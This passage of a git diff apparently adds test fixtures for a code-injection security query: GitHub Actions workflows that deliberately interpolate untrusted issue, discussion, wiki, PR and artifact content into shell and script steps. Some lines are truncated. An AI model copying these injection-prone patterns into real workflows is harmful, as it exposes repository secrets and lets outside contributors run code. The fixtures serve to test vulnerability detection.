auto-labeling" + required: false + default: "false" + python: + description: "Run Python formatting" + required: false + default: "false" + markdown: + description: "Run Markdown formatting (deprecated in favor of prettier)" + required: false + default: "false" + prettier: + description: "Run Prettier formatting for JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML" + required: false + default: "false" + swift: + description: "Run Swift formatting" + required: false + default: "false" + spelling: + description: "Run Spelling checks" + required: false + default: "false" + links: + description: "Run Broken Links checks" + required: false + default: "false" + summary: + description: "Run PR Summary" + required: false + default: "false" + openai_api_key: + description: "OpenAI API Key" + required: false + openai_model: + description: "OpenAI Model" + required: false + default: "gpt-4o" + first_issue_response: + description: "Example response to a new issue" + required: false + first_pr_response: + description: "Example response to a new PR" + required: false + github_username: + description: "GitHub username for commits" + required: false + default: "UltralyticsAssistant" + github_email: + description: "GitHub email for commits" + required: false + default: "web@ultralytics.com" + body: + description: "PR body" + required: false + default: "" +runs: + using: "composite" + steps: + - uses: astral-sh/setup-uv@v3 + - name: Install Dependencies + # Note tomli required for codespell with pyproject.toml + # For debug: + # python -m pip install --upgrade pip wheel + # pip install -q git+https://github.com/ultralytics/actions@main codespell tomli + run: | + packages="ultralytics-actions" + if [ "${{ inputs.spelling }}" = "true" ]; then + packages="$packages codespell tomli" + fi + + # On macOS, don't use sudo as it can cause environment issues + if [ "$(uname)" = "Darwin" ]; then + pip install -q $packages + else + sudo env "PATH=$PATH" uv pip install --system $packages + fi + + ultralytics-actions-info + shell: bash + - shell: bash + run: | + echo "${{ inputs.body }}" + + # Checkout Repository ---------------------------------------------------------------------------------------------- + - name: Checkout Repository + if: github.event.action != 'closed' + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name || github.repository }} + token: ${{ inputs.token }} + ref: ${{ github.head_ref || github.ref }} + fetch-depth: 0 + + # PR Summary ------------------------------------------------------------------------------------------------------- + - name: PR Summary + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.summary == 'true' && github.event.action != 'synchronize' + env: + GITHUB_TOKEN: ${{ inputs.token }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-summarize-pr + shell: bash + continue-on-error: true + + # Python formatting ------------------------------------------------------------------------------------------------ + # Ignores the following Docs rules to match Google-style docstrings: + # D100: Missing docstring in public module + # D104: Missing docstring in public package + # D203: 1 blank line required before class docstring + # D205: 1 blank line required between summary line and description + # D212: Multi-line docstring summary should start at the first line + # D213: Multi-line docstring summary should start at the second line + # D401: First line of docstring should be in imperative mood + # D406: Section name should end with a newline + # D407: Missing dashed underline after section + # D413: Missing blank line after last section + # --target-version is Python 3.8 for --extend-select UP (pyupgrade) + - name: Run Python + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.python == 'true' && github.event.action != 'closed' + run: | + ruff format \ + --line-length 120 \ + . || true + ruff check \ + --fix \ + --unsafe-fixes \ + --extend-select I,D,UP \ + --target-version py38 \ + --ignore D100,D104,D203,D205,D212,D213,D401,D406,D407,D413 \ + . || true + docformatter \ + --wrap-summaries 120 \ + --wrap-descriptions 120 \ + --pre-summary-newline \ + --close-quotes-on-newline \ + --in-place \ + --recursive \ + . + shell: bash + continue-on-error: true + + # Prettier (JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML) ------------- + - name: Run Prettier + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + run: | + ultralytics-actions-update-markdown-code-blocks + npm install --global prettier + npx prettier --write "**/*.{js,jsx,ts,tsx,css,less,scss,json,yml,yaml,html,vue,svelte}" '!**/*lock.{json,yaml,yml}' '!**/*.lock' '!**/model.json' + # Handle Markdown separately + find . -name "*.md" ! -path "*/docs/*" -exec npx prettier --write {} + + if [ -d "./docs" ]; then + find ./docs -name "*.md" ! -path "*/reference/*" -exec npx prettier --tab-width 4 --write {} + + fi + shell: bash + continue-on-error: true + + # - name: Fix MkDocs reference section changes + # if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + # run: | + # from pathlib import Path + # for file in Path("./docs").rglob('*.md'): + # content = file.read_text() + # updated_content = content.replace(".\_","._") + # file.write_text(updated_content) + # shell: python + # continue-on-error: true + + # Swift formatting ------------------------------------------------------------------------------------------------- + - name: Run Swift Formatter + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.swift == 'true' && github.event.action != 'closed' + run: | + brew install swift-format + swift-format --in-place --recursive . + shell: bash + continue-on-error: true + + # Spelling --------------------------------------------------------------------------------------------------------- + - name: Run Codespell + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.spelling == 'true' && github.event.action != 'closed' + run: | + codespell \ + --write-changes \ + --ignore-words-list "crate,nd,ned,strack,dota,ane,segway,fo,gool,winn,commend,bloc,nam,afterall,skelton,goin" \ + --skip "*.pt,*.pth,*.torchscript,*.onnx,*.tflite,*.pb,*.bin,*.param,*.mlmodel,*.engine,*.npy,*.data*,*.csv,*pnnx*,*venv*,*translat*,*lock*,__pycache__*,*.ico,*.jpg,*.png,*.mp4,*.mov,/runs,/.git,./docs/??/*.md,./docs/mkdocs_??.yml" + shell: bash + continue-on-error: true + + # Autolabel Issues and PRs (run before commit changes in case commit fails) ---------------------------------------- + - name: Autolabel Issues and PRs + if: inputs.labels == 'true' && (github.event.action == 'opened' || github.event.action == 'created') + env: + GITHUB_TOKEN: ${{ inputs.token }} + FIRST_ISSUE_RESPONSE: ${{ inputs.first_issue_response }} + FIRST_PR_RESPONSE: ${{ inputs.first_pr_response }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-first-interaction + shell: bash + continue-on-error: true + + # Commit Changes --------------------------------------------------------------------------------------------------- + - name: Commit and Push Changes + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && github.event.action != 'closed' + run: | + git config --global user.name "${{ inputs.github_username }}" + git config --global user.email "${{ inputs.github_email }}" + git pull origin ${{ github.head_ref || github.ref }} + git add . + git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token + if ! git diff --staged --quiet; then + git commit -m "Auto-format by https://ultralytics.com/actions" + git push + else + echo "No changes to commit" + fi + shell: bash + continue-on-error: false + + # Broken links ----------------------------------------------------------------------------------------------------- + - name: Broken Link Checker + if: inputs.links == 'true' && github.event.action != 'closed' + uses: lycheeverse/lychee-action@v2.0.2 + with: + # Check all markdown and html files in repo. Ignores the following status codes to reduce false positives: + # - 403(OpenVINO, "forbidden") + # - 429(Instagram, "too many requests") + # - 500(Zenodo, "cached") + # - 502(Zenodo, "bad gateway") + # - 999(LinkedIn, "unknown status code") + args: | + --scheme https + --timeout 60 + --insecure + --accept 403,429,500,502,999 + --exclude-all-private + --exclude "https?://(www\.)?(github\.com|linkedin\.com|twitter\.com|instagram\.com|kaggle\.com|fonts\.gstatic\.com|url\.com)" + "./**/*.md" + "./**/*.html" + token: ${{ inputs.token }} + output: ../lychee/results.md + fail: true + continue-on-error: false diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml new file mode 100644 index 000000000000..7b9c57354882 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml @@ -0,0 +1,29 @@ +name: Issue Workflow + +on: + issues: + types: [opened, edited] + +jobs: + redirectIssue: + runs-on: ubuntu-latest + name: Check for issue transfer + env: + content_analysis_response: undefined + steps: + - uses: actions/checkout@v2 + - name: Remove conflicting chars + env: + ISSUE_TITLE: ${{github.event.issue.title}} + uses: frabert/replace-string-action@1.2 + id: remove_quotations + with: + pattern: "\"" + string: ${{env.ISSUE_TITLE}} + replace-with: "-" + - name: Check info + id: check-info + run: | + echo "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV + + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml new file mode 100644 index 000000000000..5cf7bbd4e6bd --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml @@ -0,0 +1,28 @@ +name: Preview Deploy + +on: + workflow_run: + workflows: ["Preview Build"] + types: + - completed + +jobs: + success: + runs-on: ubuntu-latest + if: github.event.workflow_run.event == 'pull_request' && github.event.workflow_run.conclusion == 'success' + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + name: pr + + - name: save PR id + id: pr + run: echo "::set-output name=id::$( + ${{ github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' }} + steps: + - name: Download artifacts + uses: actions/github-script@v7.0.1 + with: + script: | + var artifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + console.log(artifacts); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "input-artifacts" + })[0]; + var download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/input.zip', Buffer.from(download.data)); + - name: Set needed env vars in outputs + id: prepare + run: | + unzip input.zip + echo current directory contents + ls -al + + echo Reading PR number + tmp=$(> $GITHUB_OUTPUT + + - run: echo ${{ steps.prepare.outputs.pr }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml new file mode 100644 index 000000000000..63acdc612b0e --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml @@ -0,0 +1,22 @@ +# Second Workflow +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + # Save PR id to output + - name: Save artifact data + id: artifact + run: echo "::set-output name=id::$(> $GITHUB_ENV + + #labels the issue based in the text returned in content_analysis_response var + - name: Label issue + if: env.content_analysis_response != 'Valid' + #Uses DYNAMOBOTTOKEN to allow interaction between repos + run: | + curl -v -u admin:${{ secrets.DYNAMOBOTTOKEN }} -d '{"labels": ["${{env.content_analysis_response}}"]}' ${{ github.event.issue.url }}/labels + + #This job will scan the issue content to determing if more information is needed and act acordingly + #Will only run if the "redirectIssue" job outputted a 'Valid' result + checkIssueInformation: + if: needs.redirectIssue.outputs.result == 'Valid' + name: Check for missing information + #Wait for the previous job to finish as it needs its output + needs: redirectIssue + runs-on: ubuntu-latest + env: + #The 'analysis_response' variable is used to store the script response on step one, + #and then checked on step two to know if adding the label and comment is necessary. + #The initial 'undefined' value will be overridden when the script runs. + analysis_response: undefined + #Greetings for valid issues + greetings_comment: "Thank you for submitting the issue to us. We are sorry to + see you get stuck with your workflow. While waiting for our team member to respond, + please feel free to browse our forum at https://forum.dynamobim.com/ for more Dynamo related information." + #Comment intro + comment_intro: "Hello ${{ github.actor }}, thank you for submitting this issue! + We are super excited that you want to help us make Dynamo all that it can be." + #issue_coment holds the comment format, while the missing information will be provided by analysis_response + needs_more_info_comment: "However, we need some more information in order for the Dynamo + team to investigate any further.\\n\\n" + #comment to be used if the issue is closed due to the template being empty + close_issue_comment: "However, given that there has been no additional information added, + this issue will be closed for now. Please reopen and provide additional + information if you wish the Dynamo team to investigate further.\\n\\n" + #Info asked from the user in bot comments + info_needed: "Additional information:\\n + - Filling in of the provided Template (What did you do, What did you expect to see, + What did you see instead, What packages or external references (if any) were used)\\n + - Attaching the Stack Trace (Error message that shows up when Dynamo crashes - You can copy and paste this into the Github Issue)\\n + - Upload a .DYN file that showcases the issue in action and any additional needed files, such as Revit + (Note: If you cannot share a project, you can recreate this in a quick mock-up file)\\n + - Upload a Screenshot of the error messages you see (Hover over the offending node and showcase + said errors message in the screenshot)\\n + - Reproducible steps on how to create the error in question." + #Text to ask for specific missing information (complemented by the analysis response) + specific_info: "Can you please fill in the following to the best of your ability:" + #template file name + template: "ISSUE_TEMPLATE.md" + #label to tag the issue with if its missing information + issue_label: needs more info + #amount of sections from the template that can be missing information for the issue to still be considered complete + acceptable_missing_info: 1 + steps: + #Checkout the repo + - uses: actions/checkout@v4 + + #Removes conflicting characters before using the issue content as a script parameter + - name: Remove conflicting chars + env: + ISSUE_BODY: ${{github.event.issue.body}} + uses: frabert/replace-string-action@v2.5 + id: remove_quotations + with: + pattern: "\"" + string: ${{env.ISSUE_BODY}} + replace-with: '-' + flags: g + + #Checks for missing information inside the issue content + - name: Check Information + id: check-info + env: + ISSUE_BODY: ${{ steps.remove_quotations.outputs.replaced }} + run: | + echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}" )" >> $GITHUB_ENV + + #Closes the issue if the analysis response is "Empty" + - name: Close issue + if: env.analysis_response == 'Empty' + run: | + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.close_issue_comment}} ${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X PATCH -d '{"state": "closed"}' ${{ github.event.issue.url }} + + #Adds the "needs more info" label if needed + - name: Label and comment issue + if: ((env.analysis_response != 'Valid') && (env.analysis_response != 'Empty') && (github.event.action == 'opened')) + run: | + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"labels": ["${{env.issue_label}}"]}' ${{ github.event.issue.url }}/labels + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.needs_more_info_comment}} ${{env.specific_info}} ${{env.analysis_response}}.\n\n${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments + + #Removes the "needs more info" label if the issue has the missing information + - name: Unlabel updated issue + if: env.analysis_response == 'Valid' && github.event.action == 'edited' + run: | + echo urldecode ${{env.issue_label}} + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X DELETE ${{ github.event.issue.url }}/labels/$(echo -ne "${{env.issue_label}}" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g') + + #Adds greetings message + - name: Greetings + if: env.analysis_response == 'Valid' && github.event.action == 'opened' + run: | + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.greetings_comment}}"}' ${{ github.event.issue.url }}/comments + + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml new file mode 100644 index 000000000000..ef8269151d73 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml @@ -0,0 +1,110 @@ +# issue_type_predicter.yml (https://github.com/Bughalla/dynamods_dynamo/blob/1c1d3e29ee9bca81b43d78f22bf953100ef67009/.github/workflows/issue_type_predicter.yml#L40-L40) +name: Issue Type Predicter +# This workflow uses https://github.com/DynamoDS/IssuesTypePredicter to predict the type of a github issue + +permissions: {} +on: + issues: + types: [opened, edited] + +jobs: + issue_type_Predicter: + name: Issue Type Predicter + runs-on: ubuntu-latest + env: + # The 'analysis_response' variable is used to store the response returned by issue_analyzer.ps1 + # The initial 'undefined' value will be overridden when the script runs + analysis_response: undefined + # The 'parsed_issue_body' variable is used to store the parsed issue body (after removing some sections of the body like Stack Trace) + parsed_issue_body: undefined + # The 'issue_json_string' variable is used to store parsed info of the issue body as a json string + issue_json_string: undefined + # The 'is_wish_list' variable is used to store the value returned by the IssuesTypePredicter project + is_wish_list: undefined + # issue template file name + template: "ISSUE_TEMPLATE.md" + # amount of sections from the template that can be missing information for the issue to still be considered valid + acceptable_missing_info: 1 + + steps: + # Checkout Dynamo repo + - name: Checkout Dynamo Repo + uses: actions/checkout@v4 + + # Removes quotes before using the issue content as a script parameter + - name: Remove Quotes + id: remove_quotes + uses: frabert/replace-string-action@v2.5 + env: + ISSUE_BODY: ${{ github.event.issue.body }} + with: + pattern: "\"" + string: ${{ env.ISSUE_BODY }} + replace-with: '-' + + # Analyze for missing information inside the issue content + - name: Analyze Issue Body + env: + ISSUE_BODY: ${{ steps.remove_quotes.outputs.replaced }} + run: | + echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}")" >> $GITHUB_ENV + + # Remove sections in the issue body like "Dynamo version", "Stack Trace" because won't be used to predict the issue type + - name: Clean Issue Body + if: env.analysis_response == 'Valid' + env: + ISSUE_BODY_PARSED: ${{ steps.remove_quotes.outputs.replaced }} + run: | + echo "parsed_issue_body="$(pwsh .\\.github\\scripts\\issue_body_cleaner.ps1 )"" >> $GITHUB_ENV + + # Create json string from the issue body + - name: Create Issue JSON String + if: env.analysis_response == 'Valid' + env: + ISSUE_NUMBER: ${{ github.event.issue.number }} + ISSUE_TITLE: ${{ github.event.issue.title }} + run: | + echo "issue_json_string="$(pwsh .\\.github\\scripts\\get_issue_json_body.ps1 "$ISSUE_NUMBER")"" >> $GITHUB_ENV + + # Checkout the IssuesTypePredicter repo (https://github.com/DynamoDS/IssuesTypePredicter) + - name: Checkout IssuesTypePredicter Repo + if: env.analysis_response == 'Valid' + uses: actions/checkout@v4 + with: + repository: DynamoDS/IssuesTypePredicter + path: IssuesTypePredicter + + # Setup dotnet + - name: Setup dotnet + uses: actions/setup-dotnet@v4 + with: + dotnet-version: '3.1.0' + + # Build the solution IssuesTypePredicter.sln (this contains two VS2019 ML.NET projects) + - name: Build Issues Type Predicter + if: env.analysis_response == 'Valid' + run: | + dotnet build ./IssuesTypePredicter/IssuesTypePredicter.sln --configuration Release + cp ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/bin/Release/netcoreapp3.1/MLModel.zip . + + # Execute the IssuesTypePredicter program and pass 'issue_json_string' as a parameter + - name: Run Issues Type Predicter + if: env.analysis_response == 'Valid' + run: | + echo "is_wish_list="$(dotnet run -p ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/IssuesTypePredicterML.ConsoleApp.csproj -v q "${{ env.issue_json_string }}")"" >> $GITHUB_ENV + + # If the is_wish_list variable contains 1, label the issue as "Wishlist" + - name: Label issue as 'Wishlist' + if: env.analysis_response == 'Valid' && contains(env.is_wish_list, 'IsWishlist:1') + env: + GH_TOKEN: ${{ secrets.DYNAMO_ISSUES_TOKEN }} + run: | + gh issue edit ${{ github.event.issue.number }} --add-label "Wishlist" --repo ${{ github.repository }} + + # If the issue is missing important information (don't follow the template structure), label the issue as "NotMLEvaluated" + - name: Label issue as 'NotMLEvaluated' + if: env.analysis_response != 'Valid' || env.issue_json_string == '' + env: + GH_TOKEN: ${{ secrets.DYNAMO_ISSUES_TOKEN }} + run: | + gh issue edit ${{ github.event.issue.number }} --add-label "NotMLEvaluated" --repo ${{ github.repository }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml new file mode 100644 index 000000000000..ddb98c670c75 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml @@ -0,0 +1,68 @@ +# cherry-picking.yaml (https://github.com/Bughalla/dynamods_dynamo/blob/1c1d3e29ee9bca81b43d78f22bf953100ef67009/.github/workflows/disabled/cherry-picking.yaml#L45-L51) +#DYN-3364 +#This action is disabled for now due to it not behaving as expected +name: Cherry picking +on: + push: + branches: + - master +permissions: {} +jobs: + cherry_pick: + runs-on: ubuntu-latest + env: + #Variable for the name of the branch to cherry-pick into. + #It will remain 'invalid' if no branch is specified + destination_branch: 'invalid' + #Name of the autogenerated branch to create the PR from + auto_branch: 'auto-${{github.event.after}}' + #Username for the cherrypick + user_name: "Dynamo-Bot" + steps: + - name: checkout + uses: actions/checkout@v3 + + #Removes posible conflicting characters on the commit message + #This is because the content of the message will be passed to a script as a parameter and quotation marks will split the text as if it where multiple parameters. + - name: Remove conflicting chars + uses: frabert/replace-string-action@v1.2 + id: remove_quotations + with: + pattern: "\"" + string: ${{github.event.commits[0].message}} + replace-with: "-" + flags: g + + #Checks the message looking for a cherry-pick request and extracts the target branch name + - name: Check Information + env: + ISSUE_BODY_PARSED: ${{steps.remove_quotations.outputs.replaced}} + id: check-info + run: | + echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENV + + #If a target branch was found will run the action + - if: env.destination_branch != 'invalid' + name: Create PR to branch + run: | + git config user.name "${{env.user_name}}" + git fetch --all + git checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}} + git cherry-pick -x ${{github.event.after}} --strategy-option theirs + git push -u origin ${{env.auto_branch}} + hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" + env: + #Token used for the pull request. Corresponds to the DynamoBot account + GITHUB_TOKEN: ${{secrets.DYNAMOBOTTOKEN}} + ISSUE_BODY_PARSED: ${{steps.remove_quotations.outputs.replaced}} + #This represents the title and description of the pr in Markdown format + #Everything before the first blank line will be the title + #Everything after will be included in the description + pr_message: | + Cherry-Pick from commit: ${{github.event.after}} + + ### Cherry-picking: + [Commit](https://github.com/DynamoDS/Dynamo/commit/${{github.event.after}}) + + ### Pull request: + ${{ env.ISSUE_BODY_PARSED }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml new file mode 100644 index 000000000000..fdb140ec3802 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml @@ -0,0 +1,8 @@ +on: discussion + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.discussion.title }}' + - run: echo '${{ github.event.discussion.body }}' \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml new file mode 100644 index 000000000000..649d3a6e1319 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml @@ -0,0 +1,9 @@ +on: discussion_comment + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.discussion.title }}' + - run: echo '${{ github.event.discussion.body }}' + - run: echo '${{ github.event.comment.body }}' \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml new file mode 100644 index 000000000000..b4c2ecaec700 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml @@ -0,0 +1,94 @@ +on: + workflow_call: + inputs: + botGithubId: + description: bot id + type: string + required: true + + secrets: + githubBotPAT: + description: The personal access token + required: true + +permissions: {} # all none + +jobs: + versions-check-result: + name: Publish Results + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion != 'skipped' + steps: + + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + id: search-patch + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + run_id: context.payload.workflow_run.id, + ...context.repo + }) + let artifact = allArtifacts.data.artifacts.find(artifact => artifact.name == 'git-patch') + return artifact?.id + + - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + if: steps.search-patch.outputs.result + with: + ref: '${{ github.event.workflow_run.head_sha }}' + persist-credentials: false #Opt out from persisting the default Github-token authentication in order to enable use of the bot's PAT when pushing below + + - name: Download git patch + uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + id: fetch-patch + if: steps.search-patch.outputs.result + with: + script: | + let download = await github.rest.actions.downloadArtifact({ + artifact_id: ${{ steps.search-patch.outputs.result }}, + archive_format: 'zip', + ...context.repo + }) + let fs = require('fs') + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/patch.zip`, Buffer.from(download.data)) + await exec.exec('unzip', ['patch.zip']) + let pr_number = Number(fs.readFileSync('github_pull_request_number.txt')) + core.setOutput('pull_request_number', pr_number) + await io.rmRF('patch.zip') + await io.rmRF('github_pull_request_number.txt') + + - name: Apply and push version increment + id: git-commit + if: steps.search-patch.outputs.result + run: | + set -x + # Set initial placeholder name/mail and read it from the patch later + git config --global user.email 'foo@bar' + git config --global user.name 'Foo Bar' + + git am version_increments.patch + + # Read the author's name+mail from the just applied patch and recommit it with both set as committer + botMail=$(git log -1 --pretty=format:'%ae') + botName=$(git log -1 --pretty=format:'%an') + git config --global user.email "${botMail}" + git config --global user.name "${botName}" + git commit --amend --no-edit + + fileList=$(git diff-tree --no-commit-id --name-only HEAD -r) + echo "file-list<> $GITHUB_OUTPUT + echo "$fileList" >> $GITHUB_OUTPUT + echo "EOF" >> $GITHUB_OUTPUT + + git push \ + "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \ + 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}' + env: + BOT_PA_TOKEN: ${{ secrets.githubBotPAT }} + + - name: Add or update information comment + uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + if: always() + with: + github-token: ${{ secrets.githubBotPAT }} + script: | + const fileList = `${{ steps.git-commit.outputs.file-list }}` diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml new file mode 100644 index 000000000000..0c4aa93c7a58 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml @@ -0,0 +1,95 @@ +name: changelog + +on: + workflow_call: + inputs: + taint: + description: taint + type: string + required: true + default: "" + +jobs: + changelog: + runs-on: ubuntu-latest + env: + file: CHANGELOG.md + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Check ${{ env.file }} + run: | + if [[ $(git diff --name-only origin/master HEAD -- ${{ env.file }} | grep '^${{ env.file }}$' -c) -eq 0 ]]; then + echo "Expected '${{ env.file }}' to be modified" + exit 1 + fi + update: + runs-on: ubuntu-latest + needs: changelog + continue-on-error: true + env: + file: CHANGELOG.md + next_version: next + link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' + steps: + - run: echo "${{ inputs.taint }}" + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Update ${{ env.file }} from PR title + id: update + uses: actions/github-script@v6 + env: + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + with: + result-encoding: string + script: | + const fs = require('fs'); + const file = './${{ env.file }}'; + let content = fs.readFileSync(file).toString(); + const title = '[${{ env.next_version }}]'; + const log = '${{ env.log }}'; + let exists = ${{ needs.changelog.result == 'success' }}; + + if (!content.includes(title)) { + const insertAt = content.indexOf('\n') + 1; + content = + content.slice(0, insertAt) + + `\n## ${title}\n\n\n` + + content.slice(insertAt); + } + + const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; + if (exists && ${{ github.event.action == 'edited' }}) { + const prevLog = '${{ env.prev_log }}'; + const index = content.indexOf(prevLog, insertAt); + if (index > -1) { + content = content.slice(0, index) + content.slice(index + prevLog.length); + exists = false; + } + } + + if (!exists) { + content = content.slice(0, insertAt) + log + content.slice(insertAt); + fs.writeFileSync(file, content); + return true; + } + + return false; + - name: Setup node + if: fromJson(steps.update.outputs.result) + uses: actions/setup-node@v3 + with: + node-version: 18.x + - name: Commit & Push + if: fromJson(steps.update.outputs.result) + run: | + npm ci + npx prettier --write ${{ env.file }} + git config user.name github-actions[bot] + git config user.email github-actions[bot]@users.noreply.github.com + git add ${{ env.file }} + git commit -m "update ${{ env.file }}" + git push diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml new file mode 100644 index 000000000000..a952c8c1ab85 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml @@ -0,0 +1,11 @@ +on: gollum + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.pages[1].title }}' + - run: echo '${{ github.event.pages[11].title }}' + - run: echo '${{ github.event.pages[0].page_name }}' + - run: echo '${{ github.event.pages[2222].page_name }}' + - run: echo '${{ toJSON(github.event.pages.*.title) }}' # safe \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml new file mode 